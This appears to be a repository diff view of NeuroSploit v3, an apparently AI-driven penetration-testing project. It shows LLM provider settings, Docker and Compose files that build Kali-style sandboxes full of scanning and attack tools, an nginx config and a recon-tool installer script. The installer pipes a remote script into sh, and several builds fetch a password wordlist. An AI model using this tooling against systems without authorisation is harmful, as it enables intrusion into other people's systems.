"default_model": "abab6.5-chat",
"accounts": {},
"env_key": "MINIMAX_API_KEY",
"enabled": true
},
"together": {
"id": "together",
"name": "Together AI",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.together.xyz/v1",
"tier": 2,
"default_model": "meta-llama/Llama-3-70b-chat-hf",
"accounts": {},
"env_key": "TOGETHER_API_KEY",
"enabled": true
},
"fireworks": {
"id": "fireworks",
"name": "Fireworks AI",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.fireworks.ai/inference/v1",
"tier": 2,
"default_model": "accounts/fireworks/models/llama-v3p1-70b-instruct",
"accounts": {},
"env_key": "FIREWORKS_API_KEY",
"enabled": true
},
"ollama": {
"id": "ollama",
"name": "Ollama",
"auth_type": "api_key",
"api_format": "ollama",
"base_url": "http://localhost:11434",
"tier": 3,
"default_model": "llama3",
"accounts": {},
"env_key": "OLLAMA_API_KEY",
"enabled": true
},
"lmstudio": {
"id": "lmstudio",
"name": "LM Studio",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "http://localhost:1234/v1",
"tier": 3,
"default_model": "local-model",
"accounts": {},
"env_key": "LMSTUDIO_API_KEY",
"enabled": true
}
}
File diff suppressed because it is too large Load Diff
File diff suppressed because one or more lines are too long
File diff suppressed because it is too large Load Diff
-88
View File
File diff suppressed because one or more lines are too long
-45
View File
@@ -1,45 +0,0 @@
# NeuroSploit v3 - LITE Docker Compose
# Fast builds without external security tools
# Usage: docker compose -f docker-compose.lite.yml up --build
services:
backend:
build:
context: .
dockerfile: docker/Dockerfile.backend.lite
container_name: neurosploit-backend
env_file:
- .env
environment:
- ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY:-}
- OPENAI_API_KEY=${OPENAI_API_KEY:-}
- DATABASE_URL=sqlite+aiosqlite:///./data/neurosploit.db
volumes:
- neurosploit-data:/app/data
ports:
- "8000:8000"
restart: unless-stopped
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:8000/api/health"]
interval: 30s
timeout: 10s
retries: 3
frontend:
build:
context: .
dockerfile: docker/Dockerfile.frontend
container_name: neurosploit-frontend
ports:
- "3000:80"
depends_on:
backend:
condition: service_healthy
restart: unless-stopped
volumes:
neurosploit-data:
networks:
default:
name: neurosploit-network
-45
View File
@@ -1,45 +0,0 @@
services:
backend:
build:
context: .
# Use Dockerfile.backend.lite for faster builds (no security tools)
# Use Dockerfile.backend for full version with all tools
dockerfile: docker/Dockerfile.backend
container_name: neurosploit-backend
env_file:
- .env
environment:
# These override .env if set
- ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY:-}
- OPENAI_API_KEY=${OPENAI_API_KEY:-}
- NIM_API_KEY=${NIM_API_KEY:-}
- DATABASE_URL=sqlite+aiosqlite:///./data/neurosploit.db
volumes:
- neurosploit-data:/app/data
ports:
- "8000:8000"
restart: unless-stopped
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:8000/api/health"]
interval: 30s
timeout: 10s
retries: 3
frontend:
build:
context: .
dockerfile: docker/Dockerfile.frontend
container_name: neurosploit-frontend
ports:
- "3000:80"
depends_on:
backend:
condition: service_healthy
restart: unless-stopped
volumes:
neurosploit-data:
networks:
default:
name: neurosploit-network
-103
View File
@@ -1,103 +0,0 @@
# NeuroSploit v3 - Optimized Multi-Stage Dockerfile
# Dramatically reduces build time and image size
# Supports ARM64 (Apple Silicon) and AMD64
# =============================================================================
# STAGE 1: Go Tools Builder
# =============================================================================
FROM golang:1.22-alpine AS go-builder
RUN apk add --no-cache git
WORKDIR /build
# Install Go tools in parallel where possible
RUN go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest & \
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest & \
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest & \
go install -v github.com/tomnomnom/waybackurls@latest & \
go install -v github.com/ffuf/ffuf/v2@latest & \
wait
RUN go install -v github.com/projectdiscovery/katana/cmd/katana@latest & \
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest & \
go install -v github.com/lc/gau/v2/cmd/gau@latest & \
go install -v github.com/tomnomnom/gf@latest & \
go install -v github.com/tomnomnom/qsreplace@latest & \
wait
RUN go install -v github.com/hahwul/dalfox/v2@latest & \
go install -v github.com/OJ/gobuster/v3@latest & \
go install -v github.com/jaeles-project/gospider@latest & \
go install -v github.com/tomnomnom/anew@latest & \
wait
# Optional tools (less critical)
RUN go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest 2>/dev/null || true
RUN go install -v github.com/hakluke/hakrawler@latest 2>/dev/null || true
# =============================================================================
# STAGE 2: Python Dependencies
# =============================================================================
FROM python:3.11-slim AS python-deps
WORKDIR /app
COPY backend/requirements.txt .
RUN pip install --no-cache-dir --user -r requirements.txt && \
pip install --no-cache-dir --user arjun wafw00f
# =============================================================================
# STAGE 3: Final Runtime Image
# =============================================================================
FROM python:3.11-slim AS runtime
# Install only essential runtime dependencies
RUN apt-get update && apt-get install -y --no-install-recommends \
curl \
wget \
git \
dnsutils \
nmap \
sqlmap \
jq \
ca-certificates \
libpcap0.8 \
&& rm -rf /var/lib/apt/lists/* \
&& apt-get clean
WORKDIR /app
# Copy Go binaries from builder (may be partial if some tools failed)
COPY --from=go-builder /go/bin/ /usr/local/bin/
# Note: Rust tools (feroxbuster) removed for faster builds
# Install via: cargo install feroxbuster (if needed)
# Copy Python packages
COPY --from=python-deps /root/.local /root/.local
ENV PATH=/root/.local/bin:$PATH
# Copy application code
COPY backend/ ./backend/
COPY prompts/ ./prompts/
# Create data directories
RUN mkdir -p data/reports data/scans data/recon /root/.config/nuclei
# Download wordlists (small subset for faster builds)
RUN mkdir -p /opt/wordlists && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt -O /opt/wordlists/common.txt || true && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt -O /opt/wordlists/subdomains-5000.txt || true
# Update nuclei templates (runs on first startup if needed)
RUN nuclei -update-templates -silent 2>/dev/null || true
# Health check
HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \
CMD curl -f http://localhost:8000/api/health || exit 1
EXPOSE 8000
CMD ["python", "-m", "uvicorn", "backend.main:app", "--host", "0.0.0.0", "--port", "8000"]
-32
View File
@@ -1,32 +0,0 @@
# NeuroSploit v3 - LITE Dockerfile (Fast Build)
# Minimal image without external security tools
# Use this for development or when you don't need the recon tools
FROM python:3.11-slim
# Install minimal dependencies
RUN apt-get update && apt-get install -y --no-install-recommends \
curl \
ca-certificates \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /app
# Install Python dependencies
COPY backend/requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
# Copy application code
COPY backend/ ./backend/
COPY prompts/ ./prompts/
# Create data directories
RUN mkdir -p data/reports data/scans data/recon
# Health check
HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \
CMD curl -f http://localhost:8000/api/health || exit 1
EXPOSE 8000
CMD ["python", "-m", "uvicorn", "backend.main:app", "--host", "0.0.0.0", "--port", "8000"]
-29
View File
@@ -1,29 +0,0 @@
# Build stage
FROM node:20-alpine AS builder
WORKDIR /app
# Copy package files
COPY frontend/package*.json ./
# Install dependencies
RUN npm install
# Copy source code
COPY frontend/ ./
# Build the application
RUN npm run build
# Production stage
FROM nginx:alpine
# Copy built assets
COPY --from=builder /app/dist /usr/share/nginx/html
# Copy nginx configuration
COPY docker/nginx.conf /etc/nginx/conf.d/default.conf
EXPOSE 80
CMD ["nginx", "-g", "daemon off;"]
-131
View File
@@ -1,131 +0,0 @@
# NeuroSploit v3 - Kali Linux Security Sandbox
# Per-scan container with essential tools pre-installed + on-demand install support.
#
# Build:
# docker build -f docker/Dockerfile.kali -t neurosploit-kali:latest docker/
#
# Rebuild (no cache):
# docker build --no-cache -f docker/Dockerfile.kali -t neurosploit-kali:latest docker/
#
# Or via compose:
# docker compose -f docker/docker-compose.kali.yml build
#
# Design:
# - Pre-compile Go tools (nuclei, naabu, httpx, subfinder, katana, dnsx, ffuf,
# gobuster, dalfox, waybackurls, uncover) to avoid 60s+ go install per scan
# - Pre-install common apt tools (nikto, sqlmap, masscan, whatweb) for instant use
# - Include Go, Python, pip, git so on-demand tools can be compiled/installed
# - Full Kali apt repos available for on-demand apt-get install of any security tool
# ---- Stage 1: Pre-compile Go security tools ----
FROM golang:1.26-bookworm AS go-builder
RUN apt-get update && apt-get install -y --no-install-recommends \
git build-essential libpcap-dev \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /build
# Pre-compile ProjectDiscovery suite + common Go tools
# Split into separate RUN layers for better Docker cache (if one fails, others cached)
RUN go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
RUN go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
RUN go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
RUN go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
RUN go install -v github.com/projectdiscovery/katana/cmd/katana@latest
RUN go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
RUN go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
RUN go install -v github.com/ffuf/ffuf/v2@latest
RUN go install -v github.com/OJ/gobuster/v3@v3.7.0
RUN go install -v github.com/hahwul/dalfox/v2@latest
RUN go install -v github.com/tomnomnom/waybackurls@latest
# ---- Stage 2: Kali Linux runtime ----
FROM kalilinux/kali-rolling
LABEL maintainer="NeuroSploit Team"
LABEL description="NeuroSploit Kali Sandbox - Per-scan isolated tool execution"
LABEL neurosploit.version="3.0"
LABEL neurosploit.type="kali-sandbox"
ENV DEBIAN_FRONTEND=noninteractive
# Layer 1: Core system + build tools (rarely changes, cached)
RUN apt-get update && apt-get install -y --no-install-recommends \
bash \
curl \
wget \
git \
jq \
ca-certificates \
openssl \
dnsutils \
whois \
netcat-openbsd \
libpcap-dev \
python3 \
python3-pip \
golang-go \
build-essential \
&& rm -rf /var/lib/apt/lists/*
# Layer 2: Pre-install common security tools from Kali repos (saves ~30s on-demand each)
RUN apt-get update && apt-get install -y --no-install-recommends \
nmap \
nikto \
sqlmap \
masscan \
whatweb \
&& rm -rf /var/lib/apt/lists/*
# Layer 3: VPN + network tools (for terminal agent VPN connections)
RUN apt-get update && apt-get install -y --no-install-recommends \
openvpn \
wireguard-tools \
iproute2 \
iptables \
&& rm -rf /var/lib/apt/lists/*
# Copy ALL pre-compiled Go binaries from builder
COPY --from=go-builder /go/bin/nuclei /usr/local/bin/
COPY --from=go-builder /go/bin/naabu /usr/local/bin/
COPY --from=go-builder /go/bin/httpx /usr/local/bin/
COPY --from=go-builder /go/bin/subfinder /usr/local/bin/
COPY --from=go-builder /go/bin/katana /usr/local/bin/
COPY --from=go-builder /go/bin/dnsx /usr/local/bin/
COPY --from=go-builder /go/bin/uncover /usr/local/bin/
COPY --from=go-builder /go/bin/ffuf /usr/local/bin/
COPY --from=go-builder /go/bin/gobuster /usr/local/bin/
COPY --from=go-builder /go/bin/dalfox /usr/local/bin/
COPY --from=go-builder /go/bin/waybackurls /usr/local/bin/
# Go environment for on-demand tool compilation
ENV GOPATH=/root/go
ENV PATH="${PATH}:/root/go/bin"
# Create directories
RUN mkdir -p /opt/wordlists /opt/output /opt/templates /opt/nuclei-templates
# Download commonly used wordlists (|| true so build doesn't fail on network issues)
RUN wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt \
-O /opt/wordlists/common.txt 2>/dev/null || true && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt \
-O /opt/wordlists/directory-list-medium.txt 2>/dev/null || true && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt \
-O /opt/wordlists/subdomains-5000.txt 2>/dev/null || true && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
-O /opt/wordlists/passwords-top1000.txt 2>/dev/null || true
# Update Nuclei templates
RUN nuclei -update-templates -silent 2>/dev/null || true
# Health check script
RUN printf '#!/bin/bash\nnuclei -version > /dev/null 2>&1 && naabu -version > /dev/null 2>&1 && echo "OK"\n' \
> /opt/healthcheck.sh && chmod +x /opt/healthcheck.sh
HEALTHCHECK --interval=60s --timeout=10s --retries=3 \
CMD /opt/healthcheck.sh
WORKDIR /opt/output
CMD ["bash"]
-98
View File
@@ -1,98 +0,0 @@
# NeuroSploit v3 - Security Sandbox Container
# Kali-based container with real penetration testing tools
# Provides Nuclei, Naabu, and other ProjectDiscovery tools via isolated execution
FROM golang:1.26-bookworm AS go-builder
RUN apt-get update && apt-get install -y --no-install-recommends git build-essential && \
rm -rf /var/lib/apt/lists/*
WORKDIR /build
# Install ProjectDiscovery suite + other Go security tools
RUN go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest && \
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest && \
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest && \
go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest && \
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest && \
go install -v github.com/ffuf/ffuf/v2@latest && \
go install -v github.com/OJ/gobuster/v3@v3.7.0 && \
go install -v github.com/hahwul/dalfox/v2@latest && \
go install -v github.com/tomnomnom/waybackurls@latest
# Final runtime image - Debian-based for compatibility
FROM debian:bookworm-slim
LABEL maintainer="NeuroSploit Team"
LABEL description="NeuroSploit Security Sandbox - Isolated tool execution environment"
# Install runtime dependencies
RUN apt-get update && apt-get install -y --no-install-recommends \
bash \
curl \
wget \
nmap \
python3 \
python3-pip \
git \
jq \
dnsutils \
openssl \
libpcap-dev \
ca-certificates \
whois \
netcat-openbsd \
nikto \
masscan \
&& rm -rf /var/lib/apt/lists/*
# Install Python security tools
RUN pip3 install --no-cache-dir --break-system-packages \
sqlmap \
wfuzz \
dirsearch \
arjun \
wafw00f \
2>/dev/null || pip3 install --no-cache-dir --break-system-packages sqlmap
# Copy Go binaries from builder
COPY --from=go-builder /go/bin/nuclei /usr/local/bin/
COPY --from=go-builder /go/bin/naabu /usr/local/bin/
COPY --from=go-builder /go/bin/httpx /usr/local/bin/
COPY --from=go-builder /go/bin/subfinder /usr/local/bin/
COPY --from=go-builder /go/bin/katana /usr/local/bin/
COPY --from=go-builder /go/bin/dnsx /usr/local/bin/
COPY --from=go-builder /go/bin/uncover /usr/local/bin/
COPY --from=go-builder /go/bin/ffuf /usr/local/bin/
COPY --from=go-builder /go/bin/gobuster /usr/local/bin/
COPY --from=go-builder /go/bin/dalfox /usr/local/bin/
COPY --from=go-builder /go/bin/waybackurls /usr/local/bin/
# Create directories
RUN mkdir -p /opt/wordlists /opt/output /opt/templates /opt/nuclei-templates
# Download wordlists
RUN wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt \
-O /opt/wordlists/common.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt \
-O /opt/wordlists/directory-list-medium.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt \
-O /opt/wordlists/subdomains-5000.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
-O /opt/wordlists/passwords-top1000.txt
# Update Nuclei templates (8000+ vulnerability checks)
RUN nuclei -update-templates -silent 2>/dev/null || true
# Health check script
RUN echo '#!/bin/bash\nnuclei -version > /dev/null 2>&1 && naabu -version > /dev/null 2>&1 && echo "OK"' > /opt/healthcheck.sh && \
chmod +x /opt/healthcheck.sh
HEALTHCHECK --interval=30s --timeout=10s --retries=3 \
CMD /opt/healthcheck.sh
WORKDIR /opt/output
ENTRYPOINT ["/bin/bash", "-c"]
-92
View File
@@ -1,92 +0,0 @@
# NeuroSploit v3 - Security Tools Runner Container
# Ephemeral container for running security tools in isolation
FROM golang:1.22-alpine AS go-builder
RUN apk add --no-cache git build-base
WORKDIR /build
# Install essential Go security tools
RUN go install -v github.com/ffuf/ffuf/v2@latest && \
go install -v github.com/OJ/gobuster/v3@latest && \
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest && \
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest && \
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest && \
go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest && \
go install -v github.com/hahwul/dalfox/v2@latest && \
go install -v github.com/tomnomnom/waybackurls@latest
# Rust tools builder
FROM rust:1.75-alpine AS rust-builder
RUN apk add --no-cache musl-dev openssl-dev openssl-libs-static pkgconf
# Install feroxbuster
RUN cargo install feroxbuster --locked
# Final runtime image
FROM alpine:3.19
# Install runtime dependencies and tools
RUN apk add --no-cache \
bash \
curl \
wget \
nmap \
nmap-scripts \
python3 \
py3-pip \
git \
jq \
bind-tools \
openssl \
libpcap \
ca-certificates \
nikto \
&& rm -rf /var/cache/apk/*
# Install Python security tools
RUN pip3 install --no-cache-dir --break-system-packages \
sqlmap \
wfuzz \
dirsearch \
arjun \
wafw00f \
whatweb 2>/dev/null || pip3 install --no-cache-dir --break-system-packages sqlmap wfuzz
# Copy Go binaries
COPY --from=go-builder /go/bin/* /usr/local/bin/
# Copy Rust binaries
COPY --from=rust-builder /usr/local/cargo/bin/feroxbuster /usr/local/bin/
# Install dirb
RUN apk add --no-cache dirb 2>/dev/null || \
(wget -q https://downloads.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz && \
tar -xzf dirb222.tar.gz && cd dirb222 && ./configure && make && make install && \
cd .. && rm -rf dirb222*) || true
# Create wordlists directory
RUN mkdir -p /opt/wordlists /opt/output
# Download common wordlists
RUN wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt \
-O /opt/wordlists/common.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt \
-O /opt/wordlists/directory-list-medium.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/raft-large-files.txt \
-O /opt/wordlists/raft-files.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt \
-O /opt/wordlists/subdomains-5000.txt
# Update nuclei templates
RUN nuclei -update-templates -silent 2>/dev/null || true
# Set working directory
WORKDIR /opt/output
# Default command
ENTRYPOINT ["/bin/bash", "-c"]
-38
View File
@@ -1,38 +0,0 @@
# NeuroSploit v3 - Kali Sandbox Build & Management
#
# Build image:
# docker compose -f docker/docker-compose.kali.yml build
#
# Build (no cache):
# docker compose -f docker/docker-compose.kali.yml build --no-cache
#
# Test container manually:
# docker compose -f docker/docker-compose.kali.yml run --rm kali-sandbox "nuclei -version"
#
# Note: In production, containers are managed by ContainerPool (core/container_pool.py).
# This compose file is for building the image and manual testing only.
services:
kali-sandbox:
build:
context: .
dockerfile: Dockerfile.kali
image: neurosploit-kali:latest
deploy:
resources:
limits:
memory: 2G
cpus: '2.0'
reservations:
memory: 512M
cpus: '0.5'
security_opt:
- no-new-privileges:true
cap_drop:
- ALL
cap_add:
- NET_RAW
- NET_ADMIN
labels:
neurosploit.type: "kali-sandbox"
neurosploit.version: "3.0"
-51
View File
@@ -1,51 +0,0 @@
# NeuroSploit v3 - Security Sandbox
# Isolated container for running real penetration testing tools
#
# Usage:
# docker compose -f docker-compose.sandbox.yml up -d
# docker compose -f docker-compose.sandbox.yml exec sandbox nuclei -u https://target.com
# docker compose -f docker-compose.sandbox.yml down
services:
sandbox:
build:
context: .
dockerfile: Dockerfile.sandbox
image: neurosploit-sandbox:latest
container_name: neurosploit-sandbox
command: ["sleep infinity"]
restart: unless-stopped
networks:
- sandbox-net
volumes:
- sandbox-output:/opt/output
- sandbox-templates:/opt/nuclei-templates
deploy:
resources:
limits:
memory: 2G
cpus: '2.0'
reservations:
memory: 512M
cpus: '0.5'
security_opt:
- no-new-privileges:true
cap_drop:
- ALL
cap_add:
- NET_RAW # Required for naabu/nmap raw sockets
- NET_ADMIN # Required for packet capture
healthcheck:
test: ["CMD", "/opt/healthcheck.sh"]
interval: 30s
timeout: 10s
retries: 3
networks:
sandbox-net:
driver: bridge
internal: false
volumes:
sandbox-output:
sandbox-templates:
-47
View File
@@ -1,47 +0,0 @@
server {
listen 80;
server_name localhost;
root /usr/share/nginx/html;
index index.html;
# Gzip compression
gzip on;
gzip_types text/plain text/css application/json application/javascript text/xml application/xml;
# API proxy
location /api {
proxy_pass http://backend:8000;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_read_timeout 300s;
proxy_connect_timeout 75s;
}
# WebSocket proxy for scan updates
location /ws {
proxy_pass http://backend:8000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_read_timeout 86400;
proxy_send_timeout 86400;
}
# Frontend routes - serve index.html for SPA
location / {
try_files $uri $uri/ /index.html;
}
# Cache static assets
location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2)$ {
expires 1y;
add_header Cache-Control "public, immutable";
}
}
-116
View File
File diff suppressed because one or more lines are too long
-10
View File
@@ -1,10 +0,0 @@
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fnvw5h45lqt4ay45z1d0bd2u; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 23 Jun 2026 21:13:51 GMT
Content-Length: 13318
-544
View File
@@ -1,544 +0,0 @@
#!/bin/bash
#
# NeuroSploit v2 - Reconnaissance Tools Installer
# Installs all required tools for advanced reconnaissance
#
set -e
# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# Banner
echo -e "${CYAN}"
echo "╔═══════════════════════════════════════════════════════════════╗"
echo "║ NEUROSPLOIT v2 - TOOLS INSTALLER ║"
echo "║ Advanced Reconnaissance Tools Setup ║"
echo "╚═══════════════════════════════════════════════════════════════╝"
echo -e "${NC}"
# Detect OS
detect_os() {
if [[ "$OSTYPE" == "darwin"* ]]; then
OS="macos"
PKG_MANAGER="brew"
elif [ -f /etc/debian_version ]; then
OS="debian"
PKG_MANAGER="apt"
elif [ -f /etc/redhat-release ]; then
OS="redhat"
PKG_MANAGER="dnf"
elif [ -f /etc/arch-release ]; then
OS="arch"
PKG_MANAGER="pacman"
else
OS="unknown"
PKG_MANAGER="unknown"
fi
echo -e "${BLUE}[*] Detected OS: ${OS} (Package Manager: ${PKG_MANAGER})${NC}"
}
# Check if command exists
command_exists() {
command -v "$1" &> /dev/null
}
# Print status
print_status() {
if command_exists "$1"; then
echo -e " ${GREEN}[✓]${NC} $1 - installed"
return 0
else
echo -e " ${RED}[✗]${NC} $1 - not found"
return 1
fi
}
# Install Go if not present
install_go() {
if command_exists go; then
echo -e "${GREEN}[✓] Go is already installed${NC}"
return 0
fi
echo -e "${YELLOW}[*] Installing Go...${NC}"
if [ "$OS" == "macos" ]; then
brew install go
elif [ "$OS" == "debian" ]; then
sudo apt update && sudo apt install -y golang-go
elif [ "$OS" == "redhat" ]; then
sudo dnf install -y golang
elif [ "$OS" == "arch" ]; then
sudo pacman -S --noconfirm go
else
# Manual installation
GO_VERSION="1.21.5"
wget "https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf "go${GO_VERSION}.linux-amd64.tar.gz"
rm "go${GO_VERSION}.linux-amd64.tar.gz"
export PATH=$PATH:/usr/local/go/bin
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
echo 'export PATH=$PATH:$(go env GOPATH)/bin' >> ~/.bashrc
fi
# Set GOPATH
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
}
# Install Rust if not present
install_rust() {
if command_exists cargo; then
echo -e "${GREEN}[✓] Rust is already installed${NC}"
return 0
fi
echo -e "${YELLOW}[*] Installing Rust...${NC}"
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
source "$HOME/.cargo/env"
}
# Install Python packages
install_python_packages() {
echo -e "${BLUE}[*] Installing Python packages...${NC}"
pip3 install --upgrade pip 2>/dev/null || pip install --upgrade pip
# Core packages
pip3 install requests dnspython urllib3 2>/dev/null || pip install requests dnspython urllib3
# Security tools
pip3 install wafw00f 2>/dev/null || echo -e "${YELLOW} [!] wafw00f installation failed, try: pip install wafw00f${NC}"
pip3 install paramspider 2>/dev/null || echo -e "${YELLOW} [!] paramspider installation failed${NC}"
}
# Install tool via Go
install_go_tool() {
local tool_name=$1
local repo=$2
if command_exists "$tool_name"; then
echo -e " ${GREEN}[✓]${NC} $tool_name - already installed"
return 0
fi
echo -e " ${YELLOW}[~]${NC} Installing $tool_name..."
go install "$repo@latest" 2>/dev/null
if command_exists "$tool_name"; then
echo -e " ${GREEN}[✓]${NC} $tool_name - installed successfully"
else
echo -e " ${RED}[✗]${NC} $tool_name - installation failed"
fi
}
# Install tool via Cargo (Rust)
install_cargo_tool() {
local tool_name=$1
local crate_name=${2:-$tool_name}
if command_exists "$tool_name"; then
echo -e " ${GREEN}[✓]${NC} $tool_name - already installed"
return 0
fi
echo -e " ${YELLOW}[~]${NC} Installing $tool_name..."
cargo install "$crate_name" 2>/dev/null
if command_exists "$tool_name"; then
echo -e " ${GREEN}[✓]${NC} $tool_name - installed successfully"
else
echo -e " ${RED}[✗]${NC} $tool_name - installation failed"
fi
}
# Install system packages
install_system_packages() {
echo -e "${BLUE}[*] Installing system packages...${NC}"
if [ "$OS" == "macos" ]; then
brew update
brew install nmap curl wget jq git python3 2>/dev/null || true
brew install feroxbuster 2>/dev/null || true
brew install nikto 2>/dev/null || true
brew install whatweb 2>/dev/null || true
elif [ "$OS" == "debian" ]; then
sudo apt update
sudo apt install -y nmap curl wget jq git python3 python3-pip dnsutils whois
sudo apt install -y nikto whatweb 2>/dev/null || true
elif [ "$OS" == "redhat" ]; then
sudo dnf install -y nmap curl wget jq git python3 python3-pip bind-utils whois
elif [ "$OS" == "arch" ]; then
sudo pacman -Syu --noconfirm nmap curl wget jq git python python-pip dnsutils whois
sudo pacman -S --noconfirm nikto whatweb 2>/dev/null || true
fi
}
# Install Go-based tools
install_go_tools() {
echo -e "\n${BLUE}[*] Installing Go-based reconnaissance tools...${NC}"
# Ensure Go paths are set
export GOPATH=${GOPATH:-$HOME/go}
export PATH=$PATH:$GOPATH/bin
# ProjectDiscovery tools
install_go_tool "subfinder" "github.com/projectdiscovery/subfinder/v2/cmd/subfinder"
install_go_tool "httpx" "github.com/projectdiscovery/httpx/cmd/httpx"
install_go_tool "nuclei" "github.com/projectdiscovery/nuclei/v3/cmd/nuclei"
install_go_tool "naabu" "github.com/projectdiscovery/naabu/v2/cmd/naabu"
install_go_tool "katana" "github.com/projectdiscovery/katana/cmd/katana"
install_go_tool "dnsx" "github.com/projectdiscovery/dnsx/cmd/dnsx"
install_go_tool "shuffledns" "github.com/projectdiscovery/shuffledns/cmd/shuffledns"
# Other Go tools
install_go_tool "amass" "github.com/owasp-amass/amass/v4/..."
install_go_tool "assetfinder" "github.com/tomnomnom/assetfinder"
install_go_tool "waybackurls" "github.com/tomnomnom/waybackurls"
install_go_tool "gau" "github.com/lc/gau/v2/cmd/gau"
install_go_tool "httprobe" "github.com/tomnomnom/httprobe"
install_go_tool "ffuf" "github.com/ffuf/ffuf/v2"
install_go_tool "gobuster" "github.com/OJ/gobuster/v3"
install_go_tool "gospider" "github.com/jaeles-project/gospider"
install_go_tool "hakrawler" "github.com/hakluke/hakrawler"
install_go_tool "subjack" "github.com/haccer/subjack"
install_go_tool "gowitness" "github.com/sensepost/gowitness"
install_go_tool "findomain" "github.com/Findomain/Findomain"
}
# Install Rust-based tools
install_rust_tools() {
echo -e "\n${BLUE}[*] Installing Rust-based tools...${NC}"
source "$HOME/.cargo/env" 2>/dev/null || true
install_cargo_tool "rustscan" "rustscan"
install_cargo_tool "feroxbuster" "feroxbuster"
}
# Install Nuclei templates
install_nuclei_templates() {
echo -e "\n${BLUE}[*] Updating Nuclei templates...${NC}"
if command_exists nuclei; then
nuclei -update-templates 2>/dev/null || echo -e "${YELLOW} [!] Template update failed, run manually: nuclei -update-templates${NC}"
echo -e " ${GREEN}[✓]${NC} Nuclei templates updated"
else
echo -e " ${RED}[✗]${NC} Nuclei not installed, skipping templates"
fi
}
# Install SecLists
install_seclists() {
echo -e "\n${BLUE}[*] Checking SecLists...${NC}"
SECLISTS_PATH="/opt/wordlists/SecLists"
if [ -d "$SECLISTS_PATH" ]; then
echo -e " ${GREEN}[✓]${NC} SecLists already installed at $SECLISTS_PATH"
